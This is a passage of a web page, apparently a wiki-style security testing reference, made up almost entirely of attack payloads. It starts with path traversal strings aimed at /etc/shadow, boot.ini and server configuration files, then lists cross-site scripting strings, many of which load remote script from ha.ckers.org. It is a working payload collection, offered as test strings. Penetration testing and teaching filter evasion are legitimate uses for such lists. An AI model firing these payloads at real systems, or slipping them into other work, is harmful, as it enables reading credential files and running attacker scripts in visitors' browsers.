\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
